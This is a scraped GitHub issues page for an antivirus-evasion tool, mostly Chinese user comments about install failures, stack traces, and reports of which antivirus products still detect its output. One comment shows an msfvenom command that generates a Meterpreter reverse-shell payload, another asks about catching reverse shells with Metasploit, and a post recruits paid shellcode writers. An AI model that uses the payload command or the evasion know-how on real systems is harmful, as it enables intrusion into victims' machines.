1y0n / av_evasion_tool Goto Github PK

基本上都让查杀完了

假设我的密码设置成1
那么我如何利用msf收到反弹shell？

提示缺少重要组件，程序无法运行。

更新了主程序都运行不起来了？

tdm-gcc-9.2.0 Is it installed normally or can't run

1y0n师傅
您好，我是 CT Stack 安全社区的运营jarcis。发现您的AV_Evasion_Tool工具非常优质，特邀您加入我们平台。因未找到您的联系方式，所以只能采取这样的形式，非常抱歉。
CT Stack 安全社区隶属于长亭科技，守护安全工具成长，可帮助运营、推广安全工具。每月评选优质工具打造专题月，可为工具量身定制玩法，集中收集工具使用反馈，辅助工具迭代。
如您有意向，可添加社区微信客服（客服号：CTStack）

每次都是更新放出来不久就被杀，我也很无奈。如果你的马被杀了，就在此留下反馈吧。反馈应包含杀软名称、版本（默认最新版）、查杀提示（截图最好）。

你好，请问除了KALI的系统远程程序外，DELPHI编译的其他EXE怎么转成掩日可执行的shellcode呢？
高价聘请写SHELLCODE程序，每个月包维护，按月发工资，有兴趣的加我。
联系飞机：@net20201
SKYPE:live:.cid.65323847be64d485
QQ:593766603

gcc --version
gcc (MinGW.org GCC-8.2.0-5) 8.2.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

安装后是8.2.0
打开显示缺少必要环境，但是三个我都满足了吖？求助一下

无法回连cs

强力模式点了生成选完位置之后没反应，生成其他模式的就提示生成成功

为什么生成的cs的c语言的shellcode一只提示 ‘不支持免杀此文件，请换个文件重试。’

阿里云服务器监听，打开exe，有反应，但是连接最后一步的时候会显示失败，在局域网测试成功，无问题

111

大佬好。

gcc环境已装好，杀毒已关，路径无中文。机器为win10

有关调用实时(JIT)调试而不是此对话框的详细信息，
请参见此消息的结尾。

************** 异常文本 **************
System.DllNotFoundException: 无法加载 DLL“YR3.dll”: 找不到指定的模块。 (异常来自 HRESULT:0x8007007E)。
在 掩日3._0.Form1.Generate(String input, String output, Boolean x64)
在 掩日3._0.Form1.Binary_Handler(String binary_path, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.Shellcode_Handler(String raw_shellcode, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.CtrlV()
在 掩日3._0.Form1.radioButton1_KeyDown(Object sender, KeyEventArgs e)
在 System.Windows.Forms.Control.OnKeyDown(KeyEventArgs e)
在 System.Windows.Forms.ButtonBase.OnKeyDown(KeyEventArgs kevent)
在 System.Windows.Forms.Control.ProcessKeyEventArgs(Message& m)
在 System.Windows.Forms.Control.WmKeyChar(Message& m)
在 System.Windows.Forms.Control.WndProc(Message& m)
在 System.Windows.Forms.ButtonBase.WndProc(Message& m)
在 System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

rt，报错为无法生成！

它不工作只是突然停止运行加密文件

加载到10000时出现异常

gcc版本：gcc (tdm64-1) 10.3.0
Copyright (c) 2020 Free Software Foundation, Inc.

c文件生成脚本： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=1111 -f psh-reflection >xy.c

点击选择的时候，在文件夹下找不到对应的exe文件

生成x86没问题，生成x64就报错

方便给个TG大家聊聊吗

那么问题来了～

• 掩日到底是谁？跟惊鲵有什么关系？
• 潜伏进入农家的目的是什么？
• 沧海还能不能流了？

：D

The downloaded manifest file could not be loaded bad XML
安装TDM-GCC Setup就一直报错

逛了一圈没找到3.x版本的源码
是不是没把代码放出来，还是因为我没找到。。

环境均已安装，还是运行不了

大佬你的博客能我进去康康不 让我瞅瞅 我觉得里面肯定有好东西 你让我看一眼就

360还是免杀 火绒一放下来就被秒杀

It should be great to add a self-delete function.

如题。。。。

显示生成文件成功，但是实际上没有生成该文件

大佬好。

gcc环境已装好，杀毒已关，路径无中文。机器为win10

有关调用实时(JIT)调试而不是此对话框的详细信息，
请参见此消息的结尾。

************** 异常文本 **************
System.DllNotFoundException: 无法加载 DLL“YR3.dll”: 找不到指定的模块。 (异常来自 HRESULT:0x8007007E)。
在 掩日3._0.Form1.Generate(String input, String output, Boolean x64)
在 掩日3._0.Form1.Binary_Handler(String binary_path, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.Shellcode_Handler(String raw_shellcode, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.CtrlV()
在 掩日3._0.Form1.radioButton1_KeyDown(Object sender, KeyEventArgs e)
在 System.Windows.Forms.Control.OnKeyDown(KeyEventArgs e)
在 System.Windows.Forms.ButtonBase.OnKeyDown(KeyEventArgs kevent)
在 System.Windows.Forms.Control.ProcessKeyEventArgs(Message& m)
在 System.Windows.Forms.Control.WmKeyChar(Message& m)
在 System.Windows.Forms.Control.WndProc(Message& m)
在 System.Windows.Forms.ButtonBase.WndProc(Message& m)
在 System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

勾选会报错 不勾选正常

😀

1.0的bug最大的是居然64位的执行有问题

如题,

可能要做进一步的静态免杀

火绒检测到了代码混淆器

为什么我安装你的环境提示这个

gcc安装出错了，大佬 我看那个加载安装的网站好像也不行了 http://jmeubank.github.io/tdm-gcc/，还有别的安装方法吗？gcc的

被360检测到特征了 任何方式都被杀毒了

如题